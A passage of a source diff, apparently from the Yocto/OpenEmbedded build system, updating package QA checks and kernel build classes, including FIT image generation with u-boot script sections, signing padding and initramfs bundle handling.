 QAPATHTEST[dev-so] = "package_qa_check_dev"
 def package_qa_check_dev(path, name, d, elf, messages):
@@ -183,8 +183,8 @@ def package_qa_check_dev(path, name, d, elf, messages):
     """
 
     if not name.endswith("-dev") and not name.endswith("-dbg") and not name.endswith("-ptest") and not name.startswith("nativesdk-") and path.endswith(".so") and os.path.islink(path):
-        package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package contains symlink .so: %s path '%s'" % \
-                 (name, package_qa_clean_path(path,d)))
+        package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package %s contains symlink .so '%s'" % \
+                 (name, package_qa_clean_path(path, d, name)))
 
 QAPATHTEST[dev-elf] = "package_qa_check_dev_elf"
 def package_qa_check_dev_elf(path, name, d, elf, messages):
@@ -194,8 +194,8 @@ def package_qa_check_dev_elf(path, name, d, elf, messages):
     install link-time .so files that are linker scripts.
     """
     if name.endswith("-dev") and path.endswith(".so") and not os.path.islink(path) and elf:
-        package_qa_add_message(messages, "dev-elf", "-dev package contains non-symlink .so: %s path '%s'" % \
-                 (name, package_qa_clean_path(path,d)))
+        package_qa_add_message(messages, "dev-elf", "-dev package %s contains non-symlink .so '%s'" % \
+                 (name, package_qa_clean_path(path, d, name)))
 
 QAPATHTEST[staticdev] = "package_qa_check_staticdev"
 def package_qa_check_staticdev(path, name, d, elf, messages):
@@ -208,7 +208,7 @@ def package_qa_check_staticdev(path, name, d, elf, messages):
 
     if not name.endswith("-pic") and not name.endswith("-staticdev") and not name.endswith("-ptest") and path.endswith(".a") and not path.endswith("_nonshared.a") and not '/usr/lib/debug-static/' in path and not '/.debug-static/' in path:
         package_qa_add_message(messages, "staticdev", "non -staticdev package contains static .a library: %s path '%s'" % \
-                 (name, package_qa_clean_path(path,d)))
+                 (name, package_qa_clean_path(path,d, name)))
 
 QAPATHTEST[mime] = "package_qa_check_mime"
 def package_qa_check_mime(path, name, d, elf, messages):
@@ -452,12 +452,14 @@ def package_qa_check_buildpaths(path, name, d, elf, messages):
     """
     Check for build paths inside target files and error if not found in the whitelist
     """
+    import stat
     # Ignore .debug files, not interesting
     if path.find(".debug") != -1:
         return
 
-    # Ignore symlinks
-    if os.path.islink(path):
+    # Ignore symlinks/devs/fifos
+    mode = os.lstat(path).st_mode
+    if stat.S_ISLNK(mode) or stat.S_ISBLK(mode) or stat.S_ISFIFO(mode) or stat.S_ISCHR(mode) or stat.S_ISSOCK(mode):
         return
 
     tmpdir = bytes(d.getVar('TMPDIR'), encoding="utf-8")
@@ -945,7 +947,7 @@ def package_qa_check_host_user(path, name, d, elf, messages):
 
     dest = d.getVar('PKGDEST')
     pn = d.getVar('PN')
-    home = os.path.join(dest, 'home')
+    home = os.path.join(dest, name, 'home')
     if path == home or path.startswith(home + os.sep):
         return
 
@@ -1012,26 +1014,6 @@ python do_package_qa () {
     logdir = d.getVar('T')
     pn = d.getVar('PN')
 
-    # Check the compile log for host contamination
-    compilelog = os.path.join(logdir,"log.do_compile")
-
-    if os.path.exists(compilelog):
-        statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % compilelog
-        if subprocess.call(statement, shell=True) == 0:
-            msg = "%s: The compile log indicates that host include and/or library paths were used.\n \
-        Please check the log '%s' for more information." % (pn, compilelog)
-            package_qa_handle_error("compile-host-path", msg, d)
-
-    # Check the install log for host contamination
-    installlog = os.path.join(logdir,"log.do_install")
-
-    if os.path.exists(installlog):
-        statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % installlog
-        if subprocess.call(statement, shell=True) == 0:
-            msg = "%s: The install log indicates that host include and/or library paths were used.\n \
-        Please check the log '%s' for more information." % (pn, installlog)
-            package_qa_handle_error("install-host-path", msg, d)
-
     # Scan the packages...
     pkgdest = d.getVar('PKGDEST')
     packages = set((d.getVar('PACKAGES') or '').split())
@@ -1210,7 +1192,7 @@ python do_qa_configure() {
     if bb.data.inherits_class('autotools', d) and not skip_configure_unsafe:
         bb.note("Checking autotools environment for common misconfiguration")
         for root, dirs, files in os.walk(workdir):
-            statement = "grep -q -F -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s" % \
+            statement = "grep -q -F -e 'is unsafe for cross-compilation' %s" % \
                         os.path.join(root,"config.log")
             if "config.log" in files:
                 if subprocess.call(statement, shell=True) == 0:
diff --git a/meta/classes/kernel-arch.bbclass b/meta/classes/kernel-arch.bbclass
index 07ec242e63..4cd08b96fb 100644
--- a/meta/classes/kernel-arch.bbclass
+++ b/meta/classes/kernel-arch.bbclass
@@ -61,8 +61,8 @@ HOST_LD_KERNEL_ARCH ?= "${TARGET_LD_KERNEL_ARCH}"
 TARGET_AR_KERNEL_ARCH ?= ""
 HOST_AR_KERNEL_ARCH ?= "${TARGET_AR_KERNEL_ARCH}"
 
-KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH}"
+KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH} -fdebug-prefix-map=${STAGING_KERNEL_BUILDDIR}=${KERNEL_SRC_PATH}"
 KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}"
 KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}"
-TOOLCHAIN = "gcc"
+TOOLCHAIN ?= "gcc"
 
diff --git a/meta/classes/kernel-devicetree.bbclass b/meta/classes/kernel-devicetree.bbclass
index 81dda8003f..27a4905ac6 100644
--- a/meta/classes/kernel-devicetree.bbclass
+++ b/meta/classes/kernel-devicetree.bbclass
@@ -1,14 +1,20 @@
 # Support for device tree generation
-PACKAGES_append = " \
-    ${KERNEL_PACKAGE_NAME}-devicetree \
-    ${@[d.getVar('KERNEL_PACKAGE_NAME') + '-image-zimage-bundle', ''][d.getVar('KERNEL_DEVICETREE_BUNDLE') != '1']} \
-"
+python () {
+    if not bb.data.inherits_class('nopackages', d):
+        d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-devicetree")
+        if d.getVar('KERNEL_DEVICETREE_BUNDLE') == '1':
+            d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-image-zimage-bundle")
+}
+
 FILES_${KERNEL_PACKAGE_NAME}-devicetree = "/${KERNEL_IMAGEDEST}/*.dtb /${KERNEL_IMAGEDEST}/*.dtbo"
 FILES_${KERNEL_PACKAGE_NAME}-image-zimage-bundle = "/${KERNEL_IMAGEDEST}/zImage-*.dtb.bin"
 
 # Generate kernel+devicetree bundle
 KERNEL_DEVICETREE_BUNDLE ?= "0"
 
+# dtc flags passed via DTC_FLAGS env variable
+KERNEL_DTC_FLAGS ?= ""
+
 normalize_dtb () {
 	dtb="$1"
 	if echo $dtb | grep -q '/dts/'; then
@@ -50,6 +56,10 @@ do_configure_append() {
 }
 
 do_compile_append() {
+	if [ -n "${KERNEL_DTC_FLAGS}" ]; then
+		export DTC_FLAGS="${KERNEL_DTC_FLAGS}"
+	fi
+
 	for dtbf in ${KERNEL_DEVICETREE}; do
 		dtb=`normalize_dtb "$dtbf"`
 		oe_runmake $dtb CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS}
diff --git a/meta/classes/kernel-fitimage.bbclass b/meta/classes/kernel-fitimage.bbclass
index 72b05ff8d1..7c7bcd3fc0 100644
--- a/meta/classes/kernel-fitimage.bbclass
+++ b/meta/classes/kernel-fitimage.bbclass
@@ -1,5 +1,7 @@
 inherit kernel-uboot kernel-artifact-names uboot-sign
 
+KERNEL_IMAGETYPE_REPLACEMENT = ""
+
 python __anonymous () {
     kerneltypes = d.getVar('KERNEL_IMAGETYPES') or ""
     if 'fitImage' in kerneltypes.split():
@@ -21,6 +23,8 @@ python __anonymous () {
         else:
             replacementtype = "zImage"
 
+        d.setVar("KERNEL_IMAGETYPE_REPLACEMENT", replacementtype)
+
         # Override KERNEL_IMAGETYPE_FOR_MAKE variable, which is internal
         # to kernel.bbclass . We have to override it, since we pack zImage
         # (at least for now) into the fitImage .
@@ -45,6 +49,8 @@ python __anonymous () {
         if d.getVar('UBOOT_SIGN_ENABLE') == "1" and d.getVar('UBOOT_DTB_BINARY'):
             uboot_pn = d.getVar('PREFERRED_PROVIDER_u-boot') or 'u-boot'
             d.appendVarFlag('do_assemble_fitimage', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
+            if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
+                d.appendVarFlag('do_assemble_fitimage_initramfs', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
 }
 
 # Options for the device tree compiler passed to mkimage '-D' feature:
@@ -56,6 +62,12 @@ FIT_HASH_ALG ?= "sha256"
 # fitImage Signature Algo
 FIT_SIGN_ALG ?= "rsa2048"
 
+# fitImage Padding Algo
+FIT_PAD_ALG ?= "pkcs-1.5"
+
+# Arguments passed to mkimage for signing
+UBOOT_MKIMAGE_SIGN_ARGS ?= ""
+
 #
 # Emit the fitImage ITS header
 #
@@ -124,7 +136,7 @@ fitimage_emit_section_kernel() {
 	fi
 
 	cat << EOF >> ${1}
-                kernel@${2} {
+                kernel-${2} {
                         description = "Linux kernel";
                         data = /incbin/("${3}");
                         type = "kernel";
@@ -133,7 +145,7 @@ fitimage_emit_section_kernel() {
                         compression = "${4}";
                         load = <${UBOOT_LOADADDRESS}>;
                         entry = <${ENTRYPOINT}>;
-                        hash@1 {
+                        hash-1 {
                                 algo = "${kernel_csum}";
                         };
                 };
@@ -160,14 +172,14 @@ fitimage_emit_section_dtb() {
 		dtb_loadline="load = <${UBOOT_DTB_LOADADDRESS}>;"
 	fi
 	cat << EOF >> ${1}
-                fdt@${2} {
+                fdt-${2} {
                         description = "Flattened Device Tree blob";
                         data = /incbin/("${3}");
                         type = "flat_dt";
                         arch = "${UBOOT_ARCH}";
                         compression = "none";
                         ${dtb_loadline}
-                        hash@1 {
+                        hash-1 {
                                 algo = "${dtb_csum}";
                         };
                 };
@@ -175,6 +187,43 @@ EOF
 }
 
 #
+# Emit the fitImage ITS u-boot script section
+#
+# $1 ... .its filename
+# $2 ... Image counter
+# $3 ... Path to boot script image
+fitimage_emit_section_boot_script() {
+
+	bootscr_csum="${FIT_HASH_ALG}"
+	bootscr_sign_algo="${FIT_SIGN_ALG}"
+	bootscr_sign_keyname="${UBOOT_SIGN_IMG_KEYNAME}"
+
+        cat << EOF >> $1
+                bootscr-$2 {
+                        description = "U-boot script";
+                        data = /incbin/("$3");
+                        type = "script";
+                        arch = "${UBOOT_ARCH}";
+                        compression = "none";
+                        hash-1 {
+                                algo = "$bootscr_csum";
+                        };
+                };
+EOF
+
+	if [ "${UBOOT_SIGN_ENABLE}" = "1" -a "${FIT_SIGN_INDIVIDUAL}" = "1" -a -n "$bootscr_sign_keyname" ] ; then
+		sed -i '$ d' $1
+		cat << EOF >> $1
+                        signature-1 {
+                                algo = "$bootscr_csum,$bootscr_sign_algo";
+                                key-name-hint = "$bootscr_sign_keyname";
+                        };
+                };
+EOF
+	fi
+}
+
+#
 # Emit the fitImage ITS setup section
 #
 # $1 ... .its filename
@@ -185,7 +234,7 @@ fitimage_emit_section_setup() {
 	setup_csum="${FIT_HASH_ALG}"
 
 	cat << EOF >> ${1}
-                setup@${2} {
+                setup-${2} {
                         description = "Linux setup.bin";
                         data = /incbin/("${3}");
                         type = "x86_setup";
@@ -194,7 +243,7 @@ fitimage_emit_section_setup() {
                         compression = "none";
                         load = <0x00090000>;
                         entry = <0x00090000>;
-                        hash@1 {
+                        hash-1 {
                                 algo = "${setup_csum}";
                         };
                 };
@@ -221,7 +270,7 @@ fitimage_emit_section_ramdisk() {
 	fi
 
 	cat << EOF >> ${1}
-                ramdisk@${2} {
+                ramdisk-${2} {
                         description = "${INITRAMFS_IMAGE}";
                         data = /incbin/("${3}");
                         type = "ramdisk";
@@ -230,7 +279,7 @@ fitimage_emit_section_ramdisk() {
                         compression = "none";
                         ${ramdisk_loadline}
                         ${ramdisk_entryline}
-                        hash@1 {
+                        hash-1 {
                                 algo = "${ramdisk_csum}";
                         };
                 };
@@ -244,13 +293,15 @@ EOF
 # $2 ... Linux kernel ID
 # $3 ... DTB image name
 # $4 ... ramdisk ID
-# $5 ... config ID
-# $6 ... default flag
+# $5 ... u-boot script ID
+# $6 ... config ID
+# $7 ... default flag
 fitimage_emit_section_config() {
 
 	conf_csum="${FIT_HASH_ALG}"
 	conf_sign_algo="${FIT_SIGN_ALG}"
-	if [ -n "${UBOOT_SIGN_ENABLE}" ] ; then
+	conf_padding_algo="${FIT_PAD_ALG}"
+	if [ "${UBOOT_SIGN_ENABLE}" = "1" ] ; then
 		conf_sign_keyname="${UBOOT_SIGN_KEYNAME}"
 	fi
 
@@ -260,45 +311,53 @@ fitimage_emit_section_config() {
 	kernel_line=""
 	fdt_line=""
 	ramdisk_line=""
+	bootscr_line=""
 	setup_line=""
 	default_line=""
 
 	if [ -n "${2}" ]; then
 		conf_desc="Linux kernel"
 		sep=", "
-		kernel_line="kernel = \"kernel@${2}\";"
+		kernel_line="kernel = \"kernel-${2}\";"
 	fi
 
 	if [ -n "${3}" ]; then
 		conf_desc="${conf_desc}${sep}FDT blob"
 		sep=", "
-		fdt_line="fdt = \"fdt@${3}\";"
+		fdt_line="fdt = \"fdt-${3}\";"
 	fi
 
 	if [ -n "${4}" ]; then
 		conf_desc="${conf_desc}${sep}ramdisk"
 		sep=", "
-		ramdisk_line="ramdisk = \"ramdisk@${4}\";"
+		ramdisk_line="ramdisk = \"ramdisk-${4}\";"
 	fi
 
 	if [ -n "${5}" ]; then
+		conf_desc="${conf_desc}${sep}u-boot script"
+		sep=", "
+		bootscr_line="bootscr = \"bootscr-${5}\";"
+	fi
+
+	if [ -n "${6}" ]; then
 		conf_desc="${conf_desc}${sep}setup"
-		setup_line="setup = \"setup@${5}\";"
+		setup_line="setup = \"setup-${6}\";"
 	fi
 
-	if [ "${6}" = "1" ]; then
-		default_line="default = \"conf@${3}\";"
+	if [ "${7}" = "1" ]; then
+		default_line="default = \"conf-${3}\";"
 	fi
 
 	cat << EOF >> ${1}
                 ${default_line}
-                conf@${3} {
-			description = "${6} ${conf_desc}";
+                conf-${3} {
+			description = "${7} ${conf_desc}";
 			${kernel_line}
 			${fdt_line}
 			${ramdisk_line}
+			${bootscr_line}
 			${setup_line}
-                        hash@1 {
+                        hash-1 {
                                 algo = "${conf_csum}";
                         };
 EOF
@@ -324,15 +383,21 @@ EOF
 		fi
 
 		if [ -n "${5}" ]; then
+			sign_line="${sign_line}${sep}\"bootscr\""
+			sep=", "
+		fi
+
+		if [ -n "${6}" ]; then
 			sign_line="${sign_line}${sep}\"setup\""
 		fi
 
 		sign_line="${sign_line};"
 
 		cat << EOF >> ${1}
-                        signature@1 {
+                        signature-1 {
                                 algo = "${conf_csum},${conf_sign_algo}";
                                 key-name-hint = "${conf_sign_keyname}";
+                                padding = "${conf_padding_algo}";
 				${sign_line}
                         };
 EOF
@@ -355,6 +420,7 @@ fitimage_assemble() {
 	DTBS=""
 	ramdiskcount=${3}
 	setupcount=""
+	bootscr_id=""
 	rm -f ${1} arch/${ARCH}/boot/${2}
 
 	fitimage_emit_fit_header ${1}
@@ -365,7 +431,7 @@ fitimage_assemble() {
 	fitimage_emit_section_maint ${1} imagestart
 
 	uboot_prep_kimage
-	fitimage_emit_section_kernel ${1} "${kernelcount}" linux.bin "${linux_comp}"
+	fitimage_emit_section_kernel $1 $kernelcount linux.bin "$linux_comp"
 
 	#
 	# Step 2: Prepare a DTB image section
@@ -399,7 +465,21 @@ fitimage_assemble() {
 	fi
 
 	#
-	# Step 3: Prepare a setup section. (For x86)
+	# Step 3: Prepare a u-boot script section
+	#
+
+	if [ -n "${UBOOT_ENV}" ] && [ -d "${STAGING_DIR_HOST}/boot" ]; then
+		if [ -e "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY}" ]; then
+			cp ${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} ${B}
+			bootscr_id="${UBOOT_ENV_BINARY}"
+			fitimage_emit_section_boot_script ${1} "${bootscr_id}" ${UBOOT_ENV_BINARY}
+		else
+			bbwarn "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} not found."
+		fi
+	fi
+
+	#
+	# Step 4: Prepare a setup section. (For x86)
 	#
 	if [ -e arch/${ARCH}/boot/setup.bin ]; then
 		setupcount=1
@@ -407,9 +487,9 @@ fitimage_assemble() {
 	fi
 
 	#
-	# Step 4: Prepare a ramdisk section.
+	# Step 5: Prepare a ramdisk section.
 	#
-	if [ "x${ramdiskcount}" = "x1" ] ; then
+	if [ "x${ramdiskcount}" = "x1" ] && [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
 		# Find and use the first initramfs image archive type we find
 		for img in cpio.lz4 cpio.lzo cpio.lzma cpio.xz cpio.gz ext2.gz cpio; do
 			initramfs_path="${DEPLOY_DIR_IMAGE}/${INITRAMFS_IMAGE_NAME}.${img}"
@@ -430,7 +510,7 @@ fitimage_assemble() {
 	fi
 
 	#
-	# Step 5: Prepare a configurations section
+	# Step 6: Prepare a configurations section
 	#
 	fitimage_emit_section_maint ${1} confstart
 
@@ -439,9 +519,9 @@ fitimage_assemble() {
 		for DTB in ${DTBS}; do
 			dtb_ext=${DTB##*.}
 			if [ "${dtb_ext}" = "dtbo" ]; then
-				fitimage_emit_section_config ${1} "" "${DTB}" "" "" "`expr ${i} = ${dtbcount}`"
+				fitimage_emit_section_config ${1} "" "${DTB}" "" "${bootscr_id}" "" "`expr ${i} = ${dtbcount}`"
 			else
-				fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
+				fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${bootscr_id}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
 			fi
 			i=`expr ${i} + 1`
 		done
@@ -452,7 +532,7 @@ fitimage_assemble() {
 	fitimage_emit_section_maint ${1} fitend
 
 	#
-	# Step 6: Assemble the image
+	# Step 7: Assemble the image
 	#
 	uboot-mkimage \
 		${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
@@ -460,7 +540,7 @@ fitimage_assemble() {
 		arch/${ARCH}/boot/${2}
 
 	#
-	# Step 7: Sign the image and add public key to U-Boot dtb
+	# Step 8: Sign the image and add public key to U-Boot dtb
 	#
 	if [ "x${UBOOT_SIGN_ENABLE}" = "x1" ] ; then
 		add_key_to_u_boot=""
@@ -474,7 +554,8 @@ fitimage_assemble() {
 			${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
 			-F -k "${UBOOT_SIGN_KEYDIR}" \
 			$add_key_to_u_boot \
-			-r arch/${ARCH}/boot/${2}
+			-r arch/${ARCH}/boot/${2} \
+			${UBOOT_MKIMAGE_SIGN_ARGS}
 	fi
 }
 
@@ -491,7 +572,11 @@ do_assemble_fitimage_initramfs() {
 	if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage" && \
 		test -n "${INITRAMFS_IMAGE}" ; then
 		cd ${B}
-		fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
+		if [ "${INITRAMFS_IMAGE_BUNDLE}" = "1" ]; then
+			fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage ""
+		else
+			fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
+		fi
 	fi
 }
 
@@ -502,22 +587,32 @@ kernel_do_deploy[vardepsexclude] = "DATETIME"
 kernel_do_deploy_append() {
 	# Update deploy directory
 	if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage"; then
-		echo "Copying fit-image.its source file..."
-		install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
-		ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
+		if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
+			echo "Copying fit-image.its source file..."
+			install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
+			if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+				ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
+			fi
 
-		echo "Copying linux.bin file..."
-		install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
-		ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
+			echo "Copying linux.bin file..."
+			install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
+			if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+				ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
+			fi
+		fi
 
 		if [ -n "${INITRAMFS_IMAGE}" ]; then
 			echo "Copying fit-image-${INITRAMFS_IMAGE}.its source file..."
 			install -m 0644 ${B}/fit-image-${INITRAMFS_IMAGE}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its"
 			ln -snf fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
 
-			echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
-			install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
-			ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
+			if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
+				echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
+				install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
+				if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+					ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
+				fi
+			fi
 		fi
 		if [ "${UBOOT_SIGN_ENABLE}" = "1" -a -n "${UBOOT_DTB_BINARY}" ] ; then
 			# UBOOT_DTB_IMAGE is a realfile, but we can't use
@@ -527,3 +622,13 @@ kernel_do_deploy_append() {
 		fi
 	fi
 }
+
+# The function below performs the following in case of initramfs bundles:
+# - Removes do_assemble_fitimage. FIT generation is done through
+#   do_assemble_fitimage_initramfs. do_assemble_fitimage is not needed
+#   and should not be part of the tasks to be executed.
+python () {
+    d.appendVarFlag('do_compile', 'vardeps', ' INITRAMFS_IMAGE_BUNDLE')
+    if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
+        bb.build.deltask('do_assemble_fitimage', d)
+}
diff --git a/meta/classes/kernel-module-split.bbclass b/meta/classes/kernel-module-split.bbclass
index c8ede26996..baa32e0a90 100644
--- a/meta/classes/kernel-module-split.bbclass
+++ b/meta/classes/kernel-module-split.bbclass
@@ -120,7 +120,10 @@ python split_kernel_module_packages () {
         files = d.getVar('FILES_%s' % pkg)
         files = "%s /etc/modules-load.d/%s.conf /etc/modprobe.d/%s.conf" % (files, basename, basename)
         d.setVar('FILES_%s' % pkg, files)
-        d.setVar('CONFFILES_%s' % pkg, files)
+
+        conffiles = d.getVar('CONFFILES_%s' % pkg)
+        conffiles = "%s /etc/modules-load.d/%s.conf /etc/modprobe.d/%s.conf" % (conffiles, basename, basename)
+        d.setVar('CONFFILES_%s' % pkg, conffiles)
 
         if "description" in vals:
             old_desc = d.getVar('DESCRIPTION_' + pkg) or ""
diff --git a/meta/classes/kernel-yocto.bbclass b/meta/classes/kernel-yocto.bbclass
index ec5fb7b1de..2abbc2ff66 100644
--- a/meta/classes/kernel-yocto.bbclass
+++ b/meta/classes/kernel-yocto.bbclass
@@ -105,6 +105,8 @@ do_kernel_metadata() {
 	cd ${S}
 	export KMETA=${KMETA}
 
+	bbnote "do_kernel_metadata: for summary/debug, set KCONF_AUDIT_LEVEL > 0"
+
 	# if kernel tools are available in-tree, they are preferred
 	# and are placed on the path before any external tools. Unless
 	# the external tools flag is set, in that case we do nothing.
@@ -192,7 +194,7 @@ do_kernel_metadata() {
 	# SRC_URI. If they were supplied, we convert them into include directives
 	# for the update part of the process
 	for f in ${feat_dirs}; do
-		if [ -d "${WORKDIR}/$f/meta" ]; then
+		if [ -d "${WORKDIR}/$f/kernel-meta" ]; then
 			includes="$includes -I${WORKDIR}/$f/kernel-meta"
 		elif [ -d "${WORKDIR}/../oe-local-files/$f" ]; then
 			includes="$includes -I${WORKDIR}/../oe-local-files/$f"
@@ -252,6 +254,23 @@ do_kernel_metadata() {
 			bbfatal_log "Could not generate configuration queue for ${KMACHINE}."
 		fi
 	fi
+
+	if [ ${KCONF_AUDIT_LEVEL} -gt 0 ]; then
+		bbnote "kernel meta data summary for ${KMACHINE} (${LINUX_KERNEL_TYPE}):"
+		bbnote "======================================================================"
+		if [ -n "${KMETA_EXTERNAL_BSPS}" ]; then
+			bbnote "Non kernel-cache (external) bsp"
+		fi
+		bbnote "BSP entry point / definition: $bsp_definition"
+		if [ -n "$in_tree_defconfig" ]; then
+			bbnote "KBUILD_DEFCONFIG: ${KBUILD_DEFCONFIG}"
+		fi
+		bbnote "Fragments from SRC_URI: $sccs_from_src_uri"
+		bbnote "KERNEL_FEATURES: $KERNEL_FEATURES_FINAL"
+		bbnote "Final scc/cfg list: $sccs_defconfig $bsp_definition $sccs $KERNEL_FEATURES_FINAL"
+	fi
+
+	set -e
 }
 
 do_patch() {
@@ -281,6 +300,8 @@ do_patch() {
 			fi
 		done
 	fi
+
+	set -e
 }
 
 do_kernel_checkout() {
@@ -303,6 +324,21 @@ do_kernel_checkout() {
 			fi
 		fi
 		cd ${S}
+
+		# convert any remote branches to local tracking ones
+		for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
+			b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
+			git show-ref --quiet --verify -- "refs/heads/$b"
+			if [ $? -ne 0 ]; then
+				git branch $b $i > /dev/null
+			fi
+		done
+
+		# Create a working tree copy of the kernel by checking out a branch
+		machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
+
+		# checkout and clobber any unimportant files
+		git checkout -f ${machine_branch}
 	else
 		# case: we have no git repository at all. 
 		# To support low bandwidth options for building the kernel, we'll just 
@@ -325,20 +361,7 @@ do_kernel_checkout() {
 		git clean -d -f
 	fi
 
-	# convert any remote branches to local tracking ones
-	for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
-		b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
-		git show-ref --quiet --verify -- "refs/heads/$b"
-		if [ $? -ne 0 ]; then
-			git branch $b $i > /dev/null
-		fi
-	done
-
-	# Create a working tree copy of the kernel by checking out a branch
-	machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
-
-	# checkout and clobber any unimportant files
-	git checkout -f ${machine_branch}
+	set -e
 }
 do_kernel_checkout[dirs] = "${S}"
 
@@ -506,6 +529,8 @@ do_validate_branches() {
 			kgit-s2q --clean
 		fi
 	fi
+
+	set -e
 }
 
 OE_TERMINAL_EXPORTS += "KBUILD_OUTPUT"
diff --git a/meta/classes/kernel.bbclass b/meta/classes/kernel.bbclass
index 9e3c34ad48..ca7530095e 100644
--- a/meta/classes/kernel.bbclass
+++ b/meta/classes/kernel.bbclass
@@ -1,5 +1,7 @@
 inherit linux-kernel-base kernel-module-split
 
+COMPATIBLE_HOST = ".*-linux"
+
 KERNEL_PACKAGE_NAME ??= "kernel"
 KERNEL_DEPLOYSUBDIR ??= "${@ "" if (d.getVar("KERNEL_PACKAGE_NAME") == "kernel") else d.getVar("KERNEL_PACKAGE_NAME") }"
 
@@ -73,7 +75,7 @@ python __anonymous () {
     # KERNEL_IMAGETYPES may contain a mixture of image types supported directly
     # by the kernel build system and types which are created by post-processing
     # the output of the kernel build system (e.g. compressing vmlinux ->
-    # vmlinux.gz in kernel_do_compile()).
+    # vmlinux.gz in kernel_do_transform_kernel()).
     # KERNEL_IMAGETYPE_FOR_MAKE should contain only image types supported
     # directly by the kernel build system.
     if not d.getVar('KERNEL_IMAGETYPE_FOR_MAKE'):
@@ -89,6 +91,8 @@ python __anonymous () {
     imagedest = d.getVar('KERNEL_IMAGEDEST')
 
     for type in types.split():
+        if bb.data.inherits_class('nopackages', d):
+            continue
         typelower = type.lower()
         d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
